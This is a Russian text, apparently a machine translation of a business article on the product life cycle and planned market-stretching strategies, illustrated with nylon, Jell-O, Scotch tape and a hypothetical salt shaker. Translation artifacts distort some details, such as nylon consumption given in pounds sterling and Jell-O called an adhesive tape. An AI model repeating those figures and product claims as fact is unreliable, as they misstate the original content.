Все это можно проиллюстрировать, сравнив кривую в Приложении II с кривой в Приложении I, которая показывает жизненный цикл продукта. На этапе I в выставке I обычно присутствует только одна компания — создатель, хотя вся выставка представляет всю отрасль.На этапе I инициатором выступает вся отрасль. Но на этапе 2 он делит отрасль со многими конкурентами. Следовательно, хотя Приложение I представляет собой отраслевую кривую, его этап I представляет продажи только одной компании.

Приложение II Жизненный цикл продукта — Компания-источник

Приложение II показывает жизненный цикл бренда создателя — его собственную кривую продаж, а не отраслевую. Видно, что между 1 и 2 годом его продажи растут примерно так же быстро, как и в отрасли.Но после 2-го года, в то время как отраслевые продажи в Приложении I все еще стремительно расширяются, кривая продаж производителя в Приложении II начала замедляться. Сейчас он разделяет бум со множеством конкурентов, некоторые из которых сейчас находятся в гораздо лучшем положении, чем он.

Снижение прибыли

В процессе отправитель может столкнуться с серьезным сокращением своей прибыли. Приложение III, в котором прослеживается прибыль на единицу продаж оригинатора, иллюстрирует этот момент.На этапе развития рынка его прибыль на единицу продукции отрицательна. Объем продаж слишком низкий по существующим ценам. Однако на этапе роста рынка бум удельной прибыли растет, поскольку объем производства увеличивается, а себестоимость продукции падает. Общая прибыль резко возрастает. Именно наличие такой пышной прибыли как привлекает, так и в конечном итоге уничтожает конкурентов.

Приложение III Жизненный цикл вкладов в единичную прибыль — Компания-источник

Следовательно, хотя (1) отраслевые продажи могут все еще расти (как в точке 3-го года в Приложении I), и (2) в то время как продажи исходной компании могут в тот же момент начать заметно замедляться (поскольку в Приложении II) и (3) хотя в этот момент общая прибыль отправителя может все еще расти, потому что его объем продаж огромен и при небольшом повышательном тренде, его прибыль на единицу часто будет резко снижаться.На самом деле, зачастую это происходит задолго до того, как кривая продаж выровняется. Они достигнут пика и начнут снижаться, возможно, примерно к точке 2-го года (как в Приложении III). К тому времени, когда продажи оригинала начинают стабилизироваться (как в точке 3-го года в Приложении II), удельная прибыль может фактически приближаться к нулю (как в Приложении III).

На данный момент в отрасли больше конкурентов, темпы роста отраслевого спроса несколько замедлились, и конкуренты снижают цены. Некоторые из них делают это для того, чтобы получить бизнес, а другие — потому, что их затраты ниже за счет того, что их оборудование более современное и производительное.

Стадия 3 отрасли — зрелость — обычно длится до тех пор, пока нет важных конкурентных заменителей (таких как, например, алюминий вместо стали в «жестяных» банках), нет резких сдвигов во влиятельных системах ценностей (таких как конец женского скромность в 1920-х годах и последующее разрушение рынка вуалей), отсутствие серьезных изменений в доминирующей моде (например, женская форма в виде песочных часов и поясные пояса на конце), отсутствие изменений в спросе на первичные продукты, в которых используется этот продукт. вопрос (например, влияние сокращения расширения новых железных дорог на спрос на железнодорожные шпалы) и отсутствие изменений ни в скорости устаревания продукта, ни в характере, ни в скорости введения модификаций продукта.

Зрелость может длиться долго, а может и никогда не наступить. Модные товары и модные вещи иногда внезапно достигают высот, на мгновение колеблются на пике, а затем быстро уходят в полную безвестность.

Сценическое признание

Различные характеристики этапов, описанных выше, помогут распознать этап, который занимает конкретный продукт в любой момент времени. Но ретроспективный взгляд всегда будет более точным, чем нынешний взгляд. Возможно, лучший способ увидеть текущую стадию — это попытаться предвидеть следующую стадию и работать в обратном направлении.У этого подхода есть несколько достоинств:

  • Это заставляет смотреть вперед, постоянно пытаться переосмыслить свое будущее и конкурентную среду. Это будет иметь свои награды. Как любил говорить Чарльз Ф. Кеттеринг, возможно, последний из первобытных изобретателей Детройта и, вероятно, величайший из всех его изобретателей: «Мы все должны беспокоиться о будущем, потому что именно там нам придется провести остаток нашей жизни. . » Глядя в будущее, можно лучше оценить состояние настоящего.
  • Взгляд вперед дает больше перспективы для настоящего, чем взгляд только на настоящее. Большинство людей знают о настоящем больше, чем полезно для них. Слишком хорошо знать настоящее не полезно и не полезно, поскольку наше восприятие настоящего слишком часто слишком сильно искажается неотложным давлением повседневных событий. Чтобы знать, где находится настоящее в континууме соревновательного времени и событий, часто имеет смысл попытаться узнать, что принесет будущее и когда оно его принесет, чем пытаться узнать, что на самом деле содержит само настоящее.
  • Наконец, ценность знания того, какую стадию занимает продукт в любой момент времени, заключается только в том, как этот факт используется. Но его использование всегда в будущем. Следовательно, предсказание будущей среды, в которой будет использоваться информация, часто более функционально для эффективного использования знаний о настоящем, чем знания о самом настоящем.

Последовательные действия

Концепция жизненного цикла может быть эффективно использована в стратегии как существующих, так и новых продуктов.В целях преемственности и ясности в оставшейся части этой статьи будут описаны некоторые варианты использования концепции, начиная с ранних этапов планирования нового продукта и кончая более поздними этапами поддержания рентабельности продукта. Основная дискуссия будет сосредоточена на том, что я называю политикой «продления жизни» или «растяжения рынка». 4

В той мере, в какой Приложения II и III описывают классические модели успешных новых продуктов, одной из постоянных целей исходного производителя должно быть избежание жесткой дисциплины, налагаемой ранним сокращением прибыли на стадии роста рынка, и избежание износ и отходы, столь характерные для стадии зрелости рынка.Следовательно, следующее предложение могло бы показаться разумным: когда компания разрабатывает новый продукт или услугу, она должна попытаться спланировать с самого начала ряд действий, которые будут использоваться на различных последующих этапах существования продукта, чтобы кривые продаж и прибыли были одинаковыми. постоянно поддерживаются, а не следуют своему обычному нисходящему склону.

Другими словами, предварительное планирование должно быть направлено на продление срока службы продукта. Идея заранее спланировать фактического запуска нового продукта для выполнения конкретных действий на более поздних этапах его жизненного цикла — действий, направленных на поддержание его роста и прибыльности, — которая, по-видимому, имеет большой потенциал в качестве инструмента долгосрочного продуктовая стратегия.

Жизнь нейлона

Как это может работать с продуктом, можно проиллюстрировать, посмотрев на историю нейлона. То, как быстро растущий объем продаж нейлона неоднократно и систематически увеличивался и растягивался, может служить образцом для других продуктов. То, что произошло с нейлоном, возможно, изначально не планировалось намеренно, но результаты такие же, как если бы они были запланированы.

Первые конечные применения нейлона были в основном военными — парашюты, нити, веревки.За этим последовал выход нейлона на рынок круглых трикотажных изделий и, как следствие, его доминирование на рынке женских чулочно-носочных изделий. Здесь он развил неуклонно растущие кривые роста и прибыли, о которых мечтает каждый руководитель. Через несколько лет эти кривые начали сглаживаться. Но до того, как они стали очень заметными, Du Pont уже разработала меры, призванные оживить продажи и прибыль. Он сделал несколько вещей, каждая из которых графически продемонстрирована в Приложении IV. Эта выставка и последующее объяснение допускают некоторую вольность с фактическими фактами о ситуации с нейлоном, чтобы выделить те моменты, которые я хочу сделать.Но они не позволяют себе вольностей с основными требованиями продуктовой стратегии.

Приложение IV Гипотетический жизненный цикл — нейлон

Точка А на Приложении IV показывает гипотетическую точку, в которой нейлоновая кривая (в которой в этой точке преобладает чулочно-носочные изделия) сглаживается. Если бы ничего больше не было сделано, кривая продаж продолжилась бы ровным темпом, обозначенным пунктирной линией в точке А. Это также гипотетическая точка, в которой были предприняты первые систематические усилия по продлению срока службы продукта.Du Pont, по сути, предпринял определенные «действия», которые подтолкнули продажи чулочно-носочных изделий вверх, вместо того, чтобы продолжить путь, обозначенный пунктирной линией кривой в точке A. В точке A действие № 1 подтолкнуло вверх плоскую кривую.

В точках B, C и D были предприняты другие новые «действия» по увеличению продаж и прибыли (№2, №3, №4 и т. Д.). Что это были за действия? Или, что более полезно, каково было их стратегическое содержание? Что они пытались сделать? Они использовали стратегии, которые пытались увеличить продажи по четырем различным направлениям:

1.Содействие более частому использованию продукта текущими пользователями.

2. Развитие более разнообразного использования продукта текущими пользователями.

3. Создание новых пользователей продукта за счет расширения рынка.

4. Поиск новых применений основного материала.

Частое использование.

Исследования Du Pont показали растущую тенденцию к «голой ноге» среди женщин. Это совпало с тенденцией к более повседневной жизни и снижением восприятия подростками того, что можно было бы назвать «социальной необходимостью» ношения чулок.В свете этих выводов одним из подходов к поддержанию сглаживающейся кривой продаж могло быть повторение социальной необходимости носить чулки постоянно. Это было бы действие по увеличению продаж, хотя очевидно, что это было бы сложно и чрезвычайно дорого. Но он, несомненно, мог бы соответствовать стратегии поощрения более частого использования среди текущих пользователей как средства продления срока службы продукта.

Разнообразное использование.

Для Du Pont эта стратегия приняла форму попытки продвигать «модную элегантность» тонированных чулок, а затем и узорчатых и сильно текстурированных трикотажных изделий.Идея заключалась в том, чтобы поднять инвентарь каждой женщины чулочно-носочных изделий, устаревая восприятие чулочно-носочных изделий как основного предмета моды, которое существовало только в узком диапазоне коричневых и розовых оттенков. Чулочно-носочные изделия должны были превратиться из «нейтрального» аксессуара в центральный элемент моды, с «подходящим» оттенком и рисунком для каждой верхней одежды в женском гардеробе.

Это не только повысит продажи за счет расширения женских платяных платяных шкафов и товарных запасов в магазинах, но и откроет дверь для ежегодного устаревания оттенков и рисунков, так же как и ежегодное устаревание цветов верхней одежды.Кроме того, использование цвета и рисунка для акцентирования внимания на ноге могло бы помочь остановить снижение ноги как элемент сексуальной привлекательности — тенденцию, которую заметили некоторые исследователи и которая, как они утверждали, отрицательно сказалась на продажах чулочно-носочных изделий.

новых пользователя.

Создание новых пользователей нейлоновых чулочно-носочных изделий могло бы принять форму попытки узаконить необходимость ношения чулочно-носочных изделий среди подростков и подростков младшего возраста. Потребовались бы реклама, связи с общественностью и мерчандайзинг молодых социальных лидеров и лидеров стиля.

Новое использование.

Что касается нейлона, эта тактика принесла много побед — от разнообразных видов чулочно-носочных изделий, таких как эластичные чулки и эластичные носки, до новых применений, таких как коврики, шины, подшипники и т. Д. Действительно, если бы после первоначального военного, разного и кругового трикотажа не было дальнейших инноваций в продуктах, предназначенных для создания новых применений нейлона, потребление нейлона в 1962 году достигло бы уровня насыщения на уровне примерно 50 миллионов фунтов в год.

Вместо этого в 1962 году потребление превысило 500 миллионов фунтов стерлингов.Экспонат V демонстрирует, как непрерывное развитие новых применений основного материала постоянно приводит к новым волнам продаж. Экспозиция показывает, что, несмотря на рост рынка женских чулок, совокупный результат использования военной, круговой вязки и различных группировок должен был бы привести к сглаживанию кривой продаж к 1958 году (выход нейлона на рынок тканых материалов в 1944 году существенно повысил продажи. выше, чем они были бы. Даже в этом случае продажи нетканого полотна, кругового трикотажа, а также групп военного и разного назначения достигли пика в 1957 году.)

Экспонат V Инновация новых продуктов отодвигает время полной зрелости — нейлоновая промышленность Источник: Modern Textiles Magazine, февраль 1964 г., стр. 33. © Джордан П. Йель, 1962 г.,

Если бы не добавление новых применений того же основного материала, таких как основовязаный трикотаж в 1945 году, шинный корд в 1948 году, текстурированная пряжа в 1955 году, ковровая пряжа в 1959 году и т. рост кривой потребления, который он так явно имел. На разных этапах он исчерпал бы свои существующие рынки или был бы вынужден прийти в упадок из-за конкурирующих материалов.Систематический поиск новых применений основного (и улучшенного) материала продлил и продлил срок службы продукта.

Другие примеры

Немногие компании, похоже, применяют каким-либо систематическим или планомерным образом четыре шага по продвижению продукта, описанные выше. Тем не менее, успешное применение такой стратегии растяжения характеризует историю таких хорошо известных продуктов, как клейкая лента Jell-O от General Foods Corporation и скотч Minnesota Mining & Manufacturing Co. 5

Jell-O был пионером в области простых в приготовлении желатиновых десертов. Продуманная концепция продукта и безупречная маркетинговая деятельность на ранних этапах позволили компании с самого начала получить прекрасные восходящие кривые продаж и прибыли. Но через несколько лет эти кривые, как и ожидалось, начали сглаживаться. Скотч также был пионером в этой области. После усовершенствования продукт быстро получил признание рынка благодаря продуманной концепции продукта и агрессивной организации продаж.Но, опять же, со временем кривые продаж и прибыли начали выравниваться. Однако до того, как они сильно выровнялись, 3M, как и General Foods, уже разработали меры для поддержания ранних темпов продаж и прибылей.

Обе эти компании продлили срок службы своих продуктов, по сути, выполнив все четыре действия, которые Du Pont сделала с нейлоном, — повысив их частоту использования среди текущих пользователей, более разнообразное использование среди текущих пользователей, новых пользователей и новые способы использования для основные «материалы»:

(1) Подход General Foods к увеличению частоты употребления Jell-O среди текущих потребителей заключался, по сути, в увеличении количества вкусов.Из знаменитых «шести восхитительных вкусов» Дона Уилсона Jell-O перешло к более чем дюжине. С другой стороны, 3M помогла повысить продажи среди своих нынешних пользователей, разработав множество удобных диспенсеров для скотча, которые упростили использование продукта.

(2) Создание более разнообразного использования Jell-O среди нынешних потребителей десертов включало его продвижение в качестве основы для салатов и облегчение этого использования за счет разработки разнообразных Jell-O с овощным вкусом. Точно так же 3M разработала линию цветных, узорчатых, водонепроницаемых, невидимых и самописных скотчей, которые пользовались значительным успехом в качестве запечатывающих и украшающих предметы для праздничной и подарочной упаковки.

(3) Jell-O стремился привлечь новых пользователей, выявляя людей, которые не могли принять Jell-O как популярный десерт или салат. Поэтому во время бума Metrecal Jell-O использовал рекламную тему, которая успешно добавила продукту модную привлекательность для контроля веса. Точно так же 3M представила ленту «Rocket», продукт, очень похожий на скотч, но более дешевый, а также разработала линейку коммерческих целлофановых лент различной ширины, длины и прочности. Эти действия расширили использование продукта на коммерческих и промышленных рынках.

(4) И Jell-O, и 3M ищут новые применения для основного материала. Известно, например, что женщины-потребители используют растворенный в жидкостях порошкообразный желатин в качестве средства для укрепления ногтей. И мужчины, и женщины используют его как средство для наращивания костей. Поэтому Jell-O представила «полностью безвкусный» Jell-O именно для этих целей. Компания 3M также разработала новые варианты использования основного материала — от ленты с двойным покрытием (клей с обеих сторон), которая конкурирует с обычными жидкими клеями, до светоотражающей ленты, украшающей бесчисленные автомобильные бамперы, до маркерных полос, которые конкурируют с краской.

Стратегии расширения

Существование видов жизненных циклов продуктов, показанных в Приложении I и II, и цикла единичной прибыли в Приложении III предполагает, что людям, участвующим в работе над новым продуктом, может быть очень полезно начать планирование продления срока службы своей продукции. еще до официального запуска этих продуктов. Планирование новых, продлевающих жизнь вливаний усилий (как в Приложении IV) на этом этапе, предшествующем введению, может быть чрезвычайно полезным по трем очень важным причинам.

1. Генерирует активную, а не реактивную политику продукта.

Он систематически систематизирует долгосрочные усилия компании по маркетингу и разработке продукта заранее, а не каждое усилие или действие является просто временной реакцией на неотложное давление повторяющихся конкурентных атак и падающей прибыли. Взгляд на продуктовую политику, ориентированный на продление жизни, заставляет думать и планировать наперед — думать систематическим образом о действиях, которые могут быть предприняты потенциальными конкурентами, о возможных изменениях в реакции потребителей на продукт и о необходимых действиях по продажам, которые позволяют наилучшим образом использовать преимущества эти условные события.

2. В нем излагается долгосрочный план, предназначенный для того, чтобы вдохнуть новую жизнь в продукт в нужное время, с нужной степенью осторожности и с нужным количеством усилий.

Многие действия, предназначенные для увеличения продаж и увеличения прибыли от существующих продуктов или материалов, часто предпринимаются без учета их взаимосвязи друг с другом или времени — оптимальной точки готовности потребителя к такой деятельности или точки оптимальной конкурентоспособности. Тщательное предварительное планирование задолго до того, как возникнет необходимость в такой деятельности, может помочь обеспечить соответствие времени, ухода и усилий ситуации.

Например, представляется крайне сомнительным, что бум в области женских красок и средств для окрашивания волос был бы столь же впечатляющим, если бы энергичные усилия по продаже этих продуктов предшествовали буму на лаки для волос и химические фиксаторы для волос. Последние помогли сформировать у потребителей сильное сознание о моде для волос, поскольку они позволили относительно легко создавать и носить модные прически. Когда женщинам стало легко иметь модную прическу, возникшее в результате сознание моды помогло открыть дверь для цветов и оттенков волос.Иначе и не могло быть, когда цвета и оттенки сначала создавали модное сознание и, таким образом, увеличивали продажи спреев и фиксаторов. Поскольку понимание причины такого точного порядка событий важно для понимания важности планирования продления жизни на раннем этапе до интродукции, полезно остановиться на некоторых деталях. Считайте:

Для женщин укладка волос была извечной проблемой на протяжении веков. Во-первых, длина и уход за волосами — один из наиболее очевидных способов отличить их от мужчин.Следовательно, быть привлекательным в этом различии становится решающим. Во-вторых, обрамляет волосы и подчеркивает лицо, очень похоже на красивую деревянную рамку и подчеркивает красивую картину. Таким образом, укладка волос является важным элементом в подчеркивании черт лица женщины. В-третьих, поскольку волосы длинные и мягкие, их сложно держать в привлекательном состоянии. Он запутывается во сне, на ветру, в сырую погоду, при занятиях спортом и так далее.

Следовательно, эффективное расположение женских волос, понятно, является ее первым приоритетом в уходе за волосами.Неопрятная брюнетка ничего не выиграет от превращения в блондинку. Действительно, в стране, где блондинки составляют меньшинство, переход от неопрятной брюнетки к неопрятной блондинке просто привлечет внимание к ее неряшливости. Но как только проблему укладки можно было легко «решить» с помощью спреев и закрепителей, цвета и оттенки могли стать большим бизнесом, особенно среди женщин, чьи волосы начинали седеть.

Такой же порядок приоритетов применяется в промышленных продуктах.Например, кажется совершенно невероятным, чтобы многие производственные предприятия легко согласились бы на замену старого одношпиндельного, постоянно обслуживаемого человеком, винтового станка с компьютеризированным ленточным многошпиндельным станком. Техническое обслуживание многошпиндельного станка было необходимым промежуточным этапом, хотя бы по той причине, что он потребовал меньшего изменения рабочего процесса и, конечно, меньшего концептуального скачка для компаний и обслуживающего персонала.

Что касается Jell-O, маловероятно, что овощные ароматизаторы были бы очень успешными до того, как идея желатина в качестве основы для салатов получила широкое распространение.Точно так же продвижение цветного скотча с рисунком в качестве подарка и декоративной печати, возможно, не было бы таким успешным, если бы универмаги этого не сделали, в результате их стремления более эффективно конкурировать с массовыми мерчендайзерами, предлагая больше услуг для клиентов, что ранее было продемонстрировано для потребителю, что можно сделать для упаковки и украшения подарков.

3. Возможно, наиболее важным преимуществом участия в предварительном, предварительном планировании деятельности по расширению продаж и расширению рынка на более позднем этапе жизненного цикла продукта является то, что такая практика вынуждает компанию принять более широкий взгляд на природу продукта. это имеет дело с.

В самом деле, это может даже заставить принять более широкий взгляд на бизнес компании. Возьмем, к примеру, Jell-O. Что это за продукт? За прошедшие годы Jell-O стал фирменным зонтиком для широкого спектра десертных продуктов, включая пудинги на основе кукурузного крахмала, начинки для пирогов и новый «Whip’n Chill», легкий десертный продукт, похожий на баварский крем или французский мусс. . На основе этих продуктов можно сказать, что подразделение Jell-O General Foods занимается «технологией десертов».

В случае с магнитной лентой, возможно, компания 3M пошла еще дальше в этом технологическом подходе к своему бизнесу. У него есть особый опыт (технология), на котором он построил постоянно расширяющийся бизнес. Можно сказать, что это умение связывать вещи (клеи в случае скотча) с другими предметами, особенно с тонкими материалами. Следовательно, мы видим, что 3M разрабатывает множество прибыльных товаров, в том числе электронную записывающую ленту (приклеивание электронно-чувствительных материалов к ленте), а также копировальное оборудование и материалы «Термофакс» (приклеивание термореактивных материалов к бумаге).

Заключение

Для компаний, заинтересованных в постоянном росте и прибылях, успешная стратегия создания новых продуктов должна рассматриваться как запланированная совокупность, рассчитанная на несколько лет вперед. Стратегия создания нового продукта сама по себе должна пытаться в какой-то мере предсказать вероятность, характер и время конкурентных и рыночных событий. Хотя предсказание всегда опасно и редко бывает очень точным, это, несомненно, намного лучше, чем вообще не пытаться предсказать. Фактически, каждая продуктовая стратегия и каждое бизнес-решение неизбежно включают в себя прогнозирование будущего, рынка и конкурентов.Более систематически осознавать прогнозы, которые вы делаете, чтобы действовать в соответствии с ними в наступательной, а не в оборонительной или реактивной манере, — вот истинное достоинство предварительного планирования расширения рынка и продления срока службы продукта. Результатом будет стратегия продукта, которая включает в себя своего рода план для временной последовательности условных ходов .

Еще до того, как перейти на стадию развития рынка, создатель должен сделать суждение относительно вероятной продолжительности нормального срока службы продукта, принимая во внимание возможности расширения сферы его использования и пользователей.Это суждение также поможет определить многие вещи — например, стоит ли устанавливать цену на продукт на основе скимминга или проникновения, или какие отношения следует развивать компании со своими торговыми посредниками.

Эти соображения важны, потому что на каждом этапе жизненного цикла продукта каждое управленческое решение должно учитывать конкурентные требования следующего этапа. Таким образом, решение о введении сильной политики брендинга на этапе роста рынка может помочь защитить бренд от сильной ценовой конкуренции в будущем; решение о введении политики «защищенных» дилеров на стадии развития рынка может способствовать продвижению в точках продаж в период роста рынка и так далее.Короче говоря, наличие четкого представления о будущих возможностях разработки продукта и возможностях развития рынка должно снизить вероятность привязанности к формам мерчендайзинга, которые могут оказаться нежелательными.

Такой вид заблаговременного осмысления стратегии нового продукта помогает руководству избегать других ловушек. Например, рекламные кампании, которые выглядят успешными с краткосрочной точки зрения, могут навредить на следующем этапе жизненного цикла. Таким образом, с самого начала в рекламе Metrecal использовалась сильная медицинская тема.Продажи росли до тех пор, пока имитирующие конкуренты не стали успешно подчеркивать модную стройность. Metrecal позиционировал себя как диетический продукт для потребителя с избыточным весом, и этот образ оказался гораздо менее привлекательным, чем образ диеты для людей, придерживающихся моды. Но первоначальная привлекательность Metrecal была настолько сильна и настолько хорошо реализована, что впоследствии изменить мнение людей о продукте стало непростой задачей. Очевидно, что при более тщательном долгосрочном планировании с самого начала можно более тщательно позиционировать имидж продукта и ставить перед рекламой более четко определенные цели.

Признание важности упорядоченной серии шагов при внедрении «действий» по наращиванию продаж для новых продуктов должно быть центральным ингредиентом долгосрочного планирования продукта. Тщательно спланированная программа расширения рынка, даже до того, как будет представлен новый продукт, может иметь серьезные преимущества. Разработка рационального плана на будущее также может помочь определить направление и темп текущих технических исследований в поддержку продукта. Хотя отклонения от такого плана, безусловно, должны быть сделаны для учета непредвиденных событий и пересмотренных суждений, план ставит компанию в более выгодное положение, так как заставляет происходить вещей, вместо того, чтобы постоянно реагировать на события, которые происходят .

Важно, чтобы поставщик не откладывал это долгосрочное планирование до момента выпуска продукта на рынок. То, как продукт должен быть представлен, и множество вариантов использования, для которых он может быть продвинут с самого начала, должны зависеть от тщательного рассмотрения оптимальной последовательности предлагаемых обращений к продукту и использования продукта. Рассмотрение должно быть сосредоточено не только на оптимальных действиях, но и, что не менее важно, на их оптимальной последовательности — например, , каков должен быть порядок использования различных обращений и каков должен быть порядок предлагаемого использования продуктов.Если бы Jell-O впервые предложили использовать в качестве диетического продукта, его шансы впоследствии оказать большое и легкое влияние на рынок желатиновых десертов, несомненно, были бы значительно меньше. Точно так же, если бы нейлоновые чулочно-носочные изделия с самого начала продвигались как функциональные чулочно-носочные изделия для повседневного ношения, его способность заменять шелк в качестве приемлемого чулочно-носочного изделия высокой моды значительно уменьшилась бы.

Чтобы проиллюстрировать пользу предварительного планирования для дальнейшей жизни продукта, предположим, что компания разработала непатентованный новый продукт, скажем, обычную кухонную солонку.Предположим, что сейчас ни у кого нет шейкера. Можно сказать, прежде чем запускать его, что (1) у него есть потенциальный рынок «x» миллионов домашних, институциональных и коммерческих потребителей, (2) через два года наступит рыночная зрелость, и (3) через год прибыль маржа упадет из-за вступления в силу конкуренции. Отсюда можно было бы выложить следующий план:

I. Конец первого года: расширение рынка среди текущих пользователей

Идеи — новые конструкции, такие как шейкер для формального использования, «мужской» шейкер для барбекю, старинный шейкер для домашних хозяйств «ранней Америки», миниатюрный шейкер для сервировки каждого стола, влагозащищенный дизайн для пикников на пляже.

II. Конец второго года: расширение рынка за счет новых пользователей

Идеи — дизайн для детей, дизайн стакана для пьющих пиво в барах, дизайн для садистов, которые втирают соль в открытые раны.

III. Конец третьего года: поиск новых применений

Идеи — сделать идентичный продукт для использования в качестве перцового шейкера, в качестве декоративной чесночной солонки, шейкера для бытового чистящего порошка, шейкера для посыпания силиконовой пыли на детали, обрабатываемые в механических цехах, и т. Д.

Эта попытка заранее продумать методы реактивации сглаживающейся кривой продаж задолго до того, как она станет плоской, позволяет планировщикам продукта расставлять приоритеты для каждой задачи и систематически планировать будущее расширение производства, а также потребности в капитале и маркетинге. Это предотвращает попытки сделать слишком много дел одновременно, приводит к рациональному определению приоритетов, а не случайным последствиям сроков появления новых идей, и дисциплинирует как усилия по разработке продукта, направленные на поддержку роста продукта, так и маркетинговые усилия.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *